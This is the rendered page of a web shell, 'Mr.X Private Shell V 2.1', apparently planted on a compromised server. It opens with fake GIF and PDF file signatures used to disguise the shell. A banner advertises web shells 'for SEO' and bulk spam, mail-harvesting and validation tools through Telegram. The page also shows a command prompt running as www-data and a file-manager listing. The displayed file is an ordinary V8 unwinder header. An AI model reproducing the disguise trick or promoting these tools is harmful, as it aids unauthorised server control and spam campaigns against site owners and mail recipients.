GIF89; GIF89; %PDF- %PDF- Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.129: ~ $
// Copyright 2021 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#ifndef INCLUDE_V8_UNWINDER_H_
#define INCLUDE_V8_UNWINDER_H_

#include <memory>

#include "v8-embedder-state-scope.h"  // NOLINT(build/include_directory)
#include "v8config.h"                 // NOLINT(build/include_directory)

namespace v8 {
// Holds the callee saved registers needed for the stack unwinder. It is the
// empty struct if no registers are required. Implemented in
// include/v8-unwinder-state.h.
struct CalleeSavedRegisters;

// A RegisterState represents the current state of registers used
// by the sampling profiler API.
struct V8_EXPORT RegisterState {
  RegisterState();
  ~RegisterState();
  RegisterState(const RegisterState& other);
  RegisterState& operator=(const RegisterState& other);

  void* pc;  // Instruction pointer.
  void* sp;  // Stack pointer.
  void* fp;  // Frame pointer.
  void* lr;  // Link register (or nullptr on platforms without a link register).
  // Callee saved registers (or null if no callee saved registers were stored)
  std::unique_ptr<CalleeSavedRegisters> callee_saved;
};

// A StateTag represents a possible state of the VM.
enum StateTag : uint16_t {
  JS,
  GC,
  PARSER,
  BYTECODE_COMPILER,
  COMPILER,
  OTHER,
  EXTERNAL,
  ATOMICS_WAIT,
  IDLE
};

// The output structure filled up by GetStackSample API function.
struct SampleInfo {
  size_t frames_count;              // Number of frames collected.
  void* external_callback_entry;    // External callback address if VM is
                                    // executing an external callback.
  void* context;                    // Incumbent native context address.
  void* embedder_context;           // Native context address for embedder state
  StateTag vm_state;                // Current VM state.
  EmbedderStateTag embedder_state;  // Current Embedder state
};

struct MemoryRange {
  const void* start = nullptr;
  size_t length_in_bytes = 0;
};

struct JSEntryStub {
  MemoryRange code;
};

struct JSEntryStubs {
  JSEntryStub js_entry_stub;
  JSEntryStub js_construct_entry_stub;
  JSEntryStub js_run_microtasks_entry_stub;
};

/**
 * Various helpers for skipping over V8 frames in a given stack.
 *
 * The unwinder API is only supported on the x64, ARM64 and ARM32 architectures.
 */
class V8_EXPORT Unwinder {
 public:
  /**
   * Attempt to unwind the stack to the most recent C++ frame. This function is
   * signal-safe and does not access any V8 state and thus doesn't require an
   * Isolate.
   *
   * The unwinder needs to know the location of the JS Entry Stub (a piece of
   * code that is run when C++ code calls into generated JS code). This is used
   * for edge cases where the current frame is being constructed or torn down
   * when the stack sample occurs.
   *
   * The unwinder also needs the virtual memory range of all possible V8 code
   * objects. There are two ranges required - the heap code range and the range
   * for code embedded in the binary.
   *
   * Available on x64, ARM64 and ARM32.
   *
   * \param code_pages A list of all of the ranges in which V8 has allocated
   * executable code. The caller should obtain this list by calling
   * Isolate::CopyCodePages() during the same interrupt/thread suspension that
   * captures the stack.
   * \param register_state The current registers. This is an in-out param that
   * will be overwritten with the register values after unwinding, on success.
   * \param stack_base The resulting stack pointer and frame pointer values are
   * bounds-checked against the stack_base and the original stack pointer value
   * to ensure that they are valid locations in the given stack. If these values
   * or any intermediate frame pointer values used during unwinding are ever out
   * of these bounds, unwinding will fail.
   *
   * \return True on success.
   */
  static bool TryUnwindV8Frames(const JSEntryStubs& entry_stubs,
                                size_t code_pages_length,
                                const MemoryRange* code_pages,
                                RegisterState* register_state,
                                const void* stack_base);

  /**
   * Whether the PC is within the V8 code range represented by code_pages.
   *
   * If this returns false, then calling UnwindV8Frames() with the same PC
   * and unwind_state will always fail. If it returns true, then unwinding may
   * (but not necessarily) be successful.
   *
   * Available on x64, ARM64 and ARM32
   */
  static bool PCIsInV8(size_t code_pages_length, const MemoryRange* code_pages,
                       void* pc);
};

}  // namespace v8

#endif  // INCLUDE_V8_UNWINDER_H_

Filemanager

Name Type Size Permission Actions
cppgc Folder 0755
libplatform Folder 0755
openssl Folder 0755
uv Folder 0755
common.gypi File 26.59 KB 0644
config.gypi File 32.08 KB 0644
js_native_api.h File 31.64 KB 0644
js_native_api_types.h File 6.87 KB 0644
node.h File 67.99 KB 0644
node_api.h File 10.34 KB 0644
node_api_types.h File 1.57 KB 0644
node_buffer.h File 3.6 KB 0644
node_object_wrap.h File 3.78 KB 0644
node_version.h File 4.14 KB 0644
uv.h File 71.1 KB 0644
v8-array-buffer.h File 17.89 KB 0644
v8-callbacks.h File 16.59 KB 0644
v8-container.h File 5.82 KB 0644
v8-context.h File 17.76 KB 0644
v8-cppgc.h File 7.46 KB 0644
v8-data.h File 1.58 KB 0644
v8-date.h File 1.19 KB 0644
v8-debug.h File 5.04 KB 0644
v8-embedder-heap.h File 2.71 KB 0644
v8-embedder-state-scope.h File 1.46 KB 0644
v8-exception.h File 7.41 KB 0644
v8-extension.h File 1.83 KB 0644
v8-external.h File 924 B 0644
v8-forward.h File 1.65 KB 0644
v8-function-callback.h File 19.19 KB 0644
v8-function.h File 4.42 KB 0644
v8-handle-base.h File 4.3 KB 0644
v8-initialization.h File 10.23 KB 0644
v8-internal.h File 57.22 KB 0644
v8-isolate.h File 63.38 KB 0644
v8-json.h File 1.32 KB 0644
v8-local-handle.h File 23.6 KB 0644
v8-locker.h File 3.86 KB 0644
v8-maybe.h File 4.47 KB 0644
v8-memory-span.h File 6.27 KB 0644
v8-message.h File 7.24 KB 0644
v8-microtask-queue.h File 4.95 KB 0644
v8-microtask.h File 861 B 0644
v8-object.h File 29.55 KB 0644
v8-persistent-handle.h File 17.81 KB 0644
v8-platform.h File 47.9 KB 0644
v8-primitive-object.h File 2.53 KB 0644
v8-primitive.h File 27.69 KB 0644
v8-profiler.h File 41.11 KB 0644
v8-promise.h File 5.17 KB 0644
v8-proxy.h File 1.23 KB 0644
v8-regexp.h File 3.1 KB 0644
v8-script.h File 30.59 KB 0644
v8-snapshot.h File 10.15 KB 0644
v8-source-location.h File 2.54 KB 0644
v8-statistics.h File 7.45 KB 0644
v8-template.h File 50.36 KB 0644
v8-traced-handle.h File 12.4 KB 0644
v8-typed-array.h File 11.3 KB 0644
v8-unwinder.h File 4.64 KB 0644
v8-value-serializer.h File 10.56 KB 0644
v8-value.h File 16.71 KB 0644
v8-version.h File 773 B 0644
v8-wasm.h File 6 KB 0644
v8-weak-callback-info.h File 2.41 KB 0644
v8.h File 3.69 KB 0644
v8config.h File 32.85 KB 0644
zconf.h File 16.6 KB 0644
zlib.h File 95.17 KB 0644